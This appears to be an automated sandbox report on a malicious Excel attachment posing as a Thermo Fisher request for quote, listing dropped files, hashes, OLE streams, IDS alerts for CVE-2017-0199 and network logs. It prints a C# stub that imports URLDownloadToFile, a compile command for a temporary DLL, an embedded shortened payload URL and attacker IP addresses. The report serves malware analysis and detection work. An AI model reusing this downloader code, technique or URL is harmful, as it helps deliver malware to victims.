                                                        SHA1:B89D614755F2E943DF4D510D87A7FC1A3BCF5A33
                                                        SHA-256:2CD3A2D4053954DB1196E2526545C36DFC138C6DE9B81F6264632F3132843C77
                                                        SHA-512:C182E0A1F0044B67B4B9FB66CEF9C4955629F6811D98BBFFA99225B03C43C33B1E85CACABB39F2C45EAD81CD85E98B201D5F9DA4EE0038423B1AD947270C134A
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L....C.f...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                        File Type:MSVC .res
                                                        Category:dropped
                                                        Size (bytes):652
                                                        Entropy (8bit):3.0666792719534093
                                                        Encrypted:false
                                                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grySbGak7YnqqJbXPN5Dlq5J:+RI+ycuZhNjakS1PNnqX
                                                        MD5:72A8B7F34417DBD74A468E3D3B9D432A
                                                        SHA1:B66130534EE116813913A2EDABD7D8DD4DC7C467
                                                        SHA-256:D34BE4E23B96A09F235D4D7B2453FD8F996B8B9CC2186E4C8BB16858977B88C3
                                                        SHA-512:EE3D2036CE939B7A494440B5C4D1CAB87C136E039F597E0B16BC15B379D79EBF4CBA415B5EADBD4B0DEFE5A5F08208D20DD7FD074F8E5B8C40E72837863DCDBC
                                                        Malicious:false
                                                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...n.x.t.o.l.s.l.o...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...n.x.t.o.l.s.l.o...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (349)
                                                        Category:dropped
                                                        Size (bytes):471
                                                        Entropy (8bit):3.922727193748455
                                                        Encrypted:false
                                                        SSDEEP:6:V/DsYLDS81zuVj6GMOfJNQXReKJ8SRHy4Hk5YlZmSq1JbNN1sk/Qy:V/DTLDfuMqIXfHQk2JDDIy
                                                        MD5:BD6185508A590C854E7FCC04BE543F48
                                                        SHA1:95022ADA31E64C295B7AA33DB8DDF51611416FFA
                                                        SHA-256:24E899445F90CCDCBFDD0FC00E30478BDCEF7FDDEAD4433282DCD8D76377B359
                                                        SHA-512:CB7098DF32345652EC9DF25878BC4B1B776FB055555CEF806A44B211288E1F61DFCDCB403C2B320F6B75B3991125EC48A49987F01CE58F8C471933303C74BB1E
                                                        Malicious:false
                                                        Preview:.using System;.using System.Runtime.InteropServices;..namespace WrJAbtMW.{. public class puQguhDXQy. {. [DllImport("uRLmoN.dLl", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr pFcZcjYz,string ssXeQ,string fcUzP,uint YJgQHKv,IntPtr UrB);.. }..}.
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):369
                                                        Entropy (8bit):5.158767124819941
                                                        Encrypted:false
                                                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23f+WE4WEqzxs7+AEszIP23f+WE4WEEA:p37Lvkmb6KzBXWFWZEoBXWA
                                                        MD5:CAD5736211610AD5A5977271FCAD3785
                                                        SHA1:46A85ADDEBC00D2791124471ACA8E769FE9D8774
                                                        SHA-256:FA245CAC146CFB9A04C4CAF0C798388093698A4C380FE5C548AB8C0940BDABC3
                                                        SHA-512:277A25FEA9339F8B4EA4E79264A64B99406343B8E8B56D56FAB9797685138C65F32F9A201196687ADDB7BD5543B99102B56C2CFDD5202EF8126080771AE53D16
                                                        Malicious:true
                                                        Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\nxtolslo\nxtolslo.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\nxtolslo\nxtolslo.0.cs"
                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3072
                                                        Entropy (8bit):2.8361814998001633
                                                        Encrypted:false
                                                        SSDEEP:24:etGSrEPBG5eAdF8eaHbWkE80NtgRC5ytkZfemkMEWI+ycuZhNjakS1PNnq:6rbsAdeeUb49NtgkXJemkMn1ulja3vq
                                                        MD5:78C8AA85BE2CD9CF011989C4675A1072
                                                        SHA1:10F8A8BCB3469FFC7196C14DA51C8A95A7026B0C
                                                        SHA-256:073EB319C3DB2D27094D14210C49B16136078BB89144F71ECF9FF93D81409CB2
                                                        SHA-512:4456540FDB42A72E5B77793889DB077442442348028DC7C218109C2CD1015D9A114D5E14501D10984CF83DAD5869EF73245C37AA6C7DDF6F53A4591E97815617
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#..f...........!.................#... ...@....... ....................................@.................................`#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~...... ...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................;.4.....{.....{...........................".............. B.....P ......T.........Z.....c.....i.....o.....w...T.....T...!.T.....T.......!.....*.......B.......................................+..........<Module>.nx
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                        Category:modified
                                                        Size (bytes):866
                                                        Entropy (8bit):5.2982303731198215
                                                        Encrypted:false
                                                        SSDEEP:24:AId3ka6KzBXWqEoBXW1KaMD5DqBVKVrdFAMBJTH:Akka60BXWqEoBXW1KdDcVKdBJj
                                                        MD5:AE2410AD8D6B72C5131A2477734BB774
                                                        SHA1:285918F0E613E1572D93645783F5309BF447BB7A
                                                        SHA-256:69C983AE2876868BB26399364C615840E14DF193093F4C4526B35707C3321B6C
                                                        SHA-512:AC8EFFE599A29D21DC20A447B2C6D9AC0DB73BBF806BA2E20F283459A9D611F48386471C8CC3022BDC93F5A7AD810F054B12A46C66ABD0B154F09AC5ABBF5C1A
                                                        Malicious:false
                                                        Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\nxtolslo\nxtolslo.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\nxtolslo\nxtolslo.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:very short file (no magic)
                                                        Category:dropped
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3:U:U
                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                        Malicious:false
                                                        Preview:1
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):512
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3::
                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                        Malicious:false
                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):512
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3::
                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                        Malicious:false
                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Aug 27 03:58:51 2024, Security: 1
                                                        Category:dropped
                                                        Size (bytes):578048
                                                        Entropy (8bit):7.97154096144708
                                                        Encrypted:false
                                                        SSDEEP:12288:0bT+qNuNGn4wsFXTq0eLpGDFtYzfqxVviBs0fyleXDZvdUKh:0bT59nnstBmGDomVvYs0yeN+Kh
                                                        MD5:0AFB5BFB1D8D7668A5CCE238DA947F98
                                                        SHA1:C0C607E334C4B31E3CC8D5703EC16FAA9B4766D4
                                                        SHA-256:98AD896FBA17899465C642CC1E0E745FF5A081F5871FC091C0391A5929192CA5
                                                        SHA-512:7BA7646BB5842D1B087A9F162C166C706ACDEB5FA611E27516882E77FE83FEDD36A8E58F906100F08E1678CDD8E884F8DBE7EF148DCC0F07C4334436F32C8CA9
                                                        Malicious:false
                                                        Preview:......................>.......................................................d.......f.......h.......j...............................................................................................................................................................................................................................................................................................................................................................................................................................B...................................................................................................C............... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A.......g...f...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...e.......f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):512
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3::
                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                        Malicious:false
                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                        Category:dropped
                                                        Size (bytes):598995
                                                        Entropy (8bit):7.939175852041835
                                                        Encrypted:false
                                                        SSDEEP:12288:QGGeiix5RTllnAk73cL0MZzeQanklniQGMi7B1mSwIhCjVn7:QGGei6tML0MZzeVKiQWB1mSlCjV7
                                                        MD5:A80E27FBED396BE3D87FE48DA3C4F266
                                                        SHA1:469ED03EC17F52D63DCDA80D8D359AC39243A05C
                                                        SHA-256:04E187973BDA002B985079AED6F596DD6E252BE61F59B09D2AE4D9775A295378
                                                        SHA-512:216EC349F4B32273CD91F8A840C1FE4F302D8845A0F94A63E45A1CB972FAD5786E93A153EBDE39014F7A4532D8D2B94F1A9342D8125700EA3043F726B101810A
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!.@.@...@...@../O...@...@..O@../O...@...c...@..+F...@..Rich.@..........................PE..L....C.f.................h....:...../5............@...........................=...........@..........................................p=..[...........................................................................................................text....f.......h.................. ..`.rdata..X............l..............@..@.data...x.9.........................@....ndata........:..........................rsrc....[...p=..\..................@..@................................................................................................................................................................................................................................................................................................................................................
                                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Aug 27 03:58:51 2024, Security: 1
                                                        Entropy (8bit):7.97154096144708
                                                        TrID:
                                                        • Microsoft Excel sheet (30009/1) 78.94%
                                                        • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                        File name:Thermo Fisher RFQ_TFS-1805.xls
                                                        File size:578'048 bytes
                                                        MD5:0afb5bfb1d8d7668a5cce238da947f98
                                                        SHA1:c0c607e334c4b31e3cc8d5703ec16faa9b4766d4
                                                        SHA256:98ad896fba17899465c642cc1e0e745ff5a081f5871fc091c0391a5929192ca5
                                                        SHA512:7ba7646bb5842d1b087a9f162c166c706acdeb5fa611e27516882e77fe83fedd36a8e58f906100f08e1678cdd8e884f8dbe7ef148dcc0f07c4334436f32c8ca9
                                                        SSDEEP:12288:0bT+qNuNGn4wsFXTq0eLpGDFtYzfqxVviBs0fyleXDZvdUKh:0bT59nnstBmGDomVvYs0yeN+Kh
                                                        TLSH:36C4231430D2FF8FF44BEDF54108259B1A0DEE248FA15967A8AD7B05877C28A0E1B8DD
                                                        File Content Preview:........................>.......................................................d.......f.......h.......j......................................................................................................................................................
                                                        Icon Hash:276ea3a6a6b7bfbf
                                                        Document Type:OLE
                                                        Number of OLE Files:1
                                                        Has Summary Info:
                                                        Application Name:Microsoft Excel
                                                        Encrypted Document:True
                                                        Contains Word Document Stream:False
                                                        Contains Workbook/Book Stream:True
                                                        Contains PowerPoint Document Stream:False
                                                        Contains Visio Document Stream:False
                                                        Contains ObjectPool Stream:False
                                                        Flash Objects Count:0
                                                        Contains VBA Macros:False
                                                        Code Page:1252
                                                        Author:
                                                        Last Saved By:
                                                        Create Time:2006-09-16 00:00:00
                                                        Last Saved Time:2024-08-27 02:58:51
                                                        Creating Application:Microsoft Excel
                                                        Security:1
                                                        Document Code Page:1252
                                                        Thumbnail Scaling Desired:False
                                                        Contains Dirty Links:False
                                                        Shared Document:False
                                                        Changed Hyperlinks:False
                                                        Application Version:786432
                                                        General
                                                        Stream Path:\x1CompObj
                                                        CLSID:
                                                        File Type:data
                                                        Stream Size:114
                                                        Entropy:4.25248375192737
                                                        Base64 Encoded:True
                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                        General
                                                        Stream Path:\x5DocumentSummaryInformation
                                                        CLSID:
                                                        File Type:data
                                                        Stream Size:244
                                                        Entropy:2.889430592781307
                                                        Base64 Encoded:False
                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                        General
                                                        Stream Path:\x5SummaryInformation
                                                        CLSID:
                                                        File Type:data
                                                        Stream Size:200
                                                        Entropy:3.3020681057018666
                                                        Base64 Encoded:False
                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . p . - . . . . . . . . .
                                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                        General
                                                        Stream Path:MBD004B4616/\x1CompObj
                                                        CLSID:
                                                        File Type:data
                                                        Stream Size:99
                                                        Entropy:3.631242196770981
                                                        Base64 Encoded:False
                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                        General
                                                        Stream Path:MBD004B4616/Package
                                                        CLSID:
                                                        File Type:Microsoft Excel 2007+
                                                        Stream Size:11613
                                                        Entropy:7.132741312937571
                                                        Base64 Encoded:True
                                                        Data ASCII:P K . . . . . . . . . . ! . . o . . . L . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                        Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a2 c8 b4 f4 6f 01 00 00 4c 05 00 00 13 00 cb 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 c7 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        General
                                                        Stream Path:MBD004B4617/\x1CompObj
                                                        CLSID:
                                                        File Type:data
                                                        Stream Size:99
                                                        Entropy:3.631242196770981
                                                        Base64 Encoded:False
                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                        General
                                                        Stream Path:MBD004B4617/Package
                                                        CLSID:
                                                        File Type:Microsoft Excel 2007+
                                                        Stream Size:19363
                                                        Entropy:7.65458028132816
                                                        Base64 Encoded:True
                                                        Data ASCII:P K . . . . . . . . . . ! . D . 2 . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                        Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 44 19 a7 ee 32 01 00 00 c9 02 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        General
                                                        Stream Path:MBD004B4618/\x1Ole
                                                        CLSID:
                                                        File Type:data
                                                        Stream Size:608
                                                        Entropy:6.067759644763554
                                                        Base64 Encoded:True
                                                        Data ASCII:. . . . ' . . . . + f . . . . . . . . . . . . " . . . y . . . K . . . . . h . t . t . p . s . : . / . / . z . h . o . r . t . . . d . e . / . 6 . X . c . I . 3 . x . . . I | J i . % . . w K < . 6 . M U > = k b . z . . ] . . . , 3 . o C a . . 8 $ g . T . & . " q : f g % 2 f E 0 . a c . \\ E P u . Z a . n 2 . m . T _ . a A F J # T . c . 4 . 3 T . C . + . . ` G . S . K ` . n { > . . l . . x O E . = . R X . i t w h ) . . . . . . . . . . . . . . . . . . . n . o . M . a . K . 0 . z . S . x . d . W . y . 5 . Y
                                                        Data Raw:01 00 00 02 27 1e 18 08 a3 0b 2b 66 00 00 00 00 00 00 00 00 00 00 00 00 22 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 1e 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 7a 00 68 00 6f 00 72 00 74 00 2e 00 64 00 65 00 2f 00 36 00 58 00 63 00 49 00 33 00 78 00 00 00 49 b7 86 7c bd ba 4a 69 92 a2 0e 25 ee 1a b7 c7 83 77 4b 3c c0 09 36 84 1e 4d 8b f1 55 3e 3d 6b
                                                        General
                                                        Stream Path:Workbook
                                                        CLSID:
                                                        File Type:Applesoft BASIC program data, first line number 16
                                                        Stream Size:537414
                                                        Entropy:7.99937475845537
                                                        Base64 Encoded:True
                                                        Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . " _ | % J f . / c + 7 . X ( b : 7 . Y 3 e . ! . y I . ^ w v . - K . . . . . . . . . . \\ . p . . . . . . 3 ! . } . . d w G . . > . . ) ' " { . S 2 S . . p R . L . . c b ] i e b M ^ ! . | q W . . t . 9 s I . . > . ` o ~ B . . . . . a . . . _ S . . . = . . . . . f . . . b . . 5 p L . . . . . ! . . . . s a . . . . . . . . . . . . . ^ . . . d = . . . . S . ^ . . . x / ` @ . . . $ . . . u " . . . . . . . . . o | . . . H . . . < 1 . . . I . } ^ A ] . _ P %
                                                        Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 19 22 fc 5f f9 7c 25 ab 4a b0 66 1c 2f 63 d7 2b 37 01 58 28 62 3a be 37 10 95 59 33 65 b6 e9 ad 8f ef 21 d7 cf be 79 49 00 5e 77 76 c3 ab 2d 4b e1 00 02 00 b0 04 c1 00 02 00 b8 e1 e2 00 00 00 5c 00 70 00 bc d3 82 af 97 d1 b1 12 d4 88 fe dd b9 33 bc 21 c7 88 c5 7d cf 0c 12 c7 64 77 47 dd 07 90
                                                        TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                                        2024-08-28T07:01:17.917438+0200TCP2024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl14916280192.168.2.22192.3.243.166
                                                        2024-08-28T07:01:41.779866+0200TCP2024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl14916980192.168.2.22192.3.243.166
                                                        2024-08-28T07:01:17.917487+0200TCP2024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)18049162192.3.243.166192.168.2.22
                                                        2024-08-28T07:01:19.900908+0200TCP2024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl14916480192.168.2.22192.3.243.166
                                                        2024-08-28T07:01:19.900912+0200TCP2024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)18049164192.3.243.166192.168.2.22
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Aug 28, 2024 07:01:15.464978933 CEST49161443192.168.2.2288.99.66.38
                                                        Aug 28, 2024 07:01:15.465029001 CEST4434916188.99.66.38192.168.2.22
                                                        Aug 28, 2024 07:01:15.465087891 CEST49161443192.168.2.2288.99.66.38
                                                        Aug 28, 2024 07:01:15.474051952 CEST49161443192.168.2.2288.99.66.38
                                                        Aug 28, 2024 07:01:15.474061966 CEST4434916188.99.66.38192.168.2.22
                                                        Aug 28, 2024 07:01:16.145759106 CEST4434916188.99.66.38192.168.2.22
                                                        Aug 28, 2024 07:01:16.145951986 CEST49161443192.168.2.2288.99.66.38
                                                        Aug 28, 2024 07:01:16.151324987 CEST49161443192.168.2.2288.99.66.38
                                                        Aug 28, 2024 07:01:16.151345015 CEST4434916188.99.66.38192.168.2.22
                                                        Aug 28, 2024 07:01:16.151717901 CEST4434916188.99.66.38192.168.2.22
                                                        Aug 28, 2024 07:01:16.151771069 CEST49161443192.168.2.2288.99.66.38
                                                        Aug 28, 2024 07:01:16.244688034 CEST49161443192.168.2.2288.99.66.38
                                                        Aug 28, 2024 07:01:16.288496971 CEST4434916188.99.66.38192.168.2.22
                                                        Aug 28, 2024 07:01:16.446482897 CEST4434916188.99.66.38192.168.2.22
                                                        Aug 28, 2024 07:01:16.446590900 CEST4434916188.99.66.38192.168.2.22
                                                        Aug 28, 2024 07:01:16.446646929 CEST49161443192.168.2.2288.99.66.38
                                                        Aug 28, 2024 07:01:16.446976900 CEST49161443192.168.2.2288.99.66.38
                                                        Aug 28, 2024 07:01:16.447948933 CEST49161443192.168.2.2288.99.66.38
                                                        Aug 28, 2024 07:01:16.447967052 CEST4434916188.99.66.38192.168.2.22
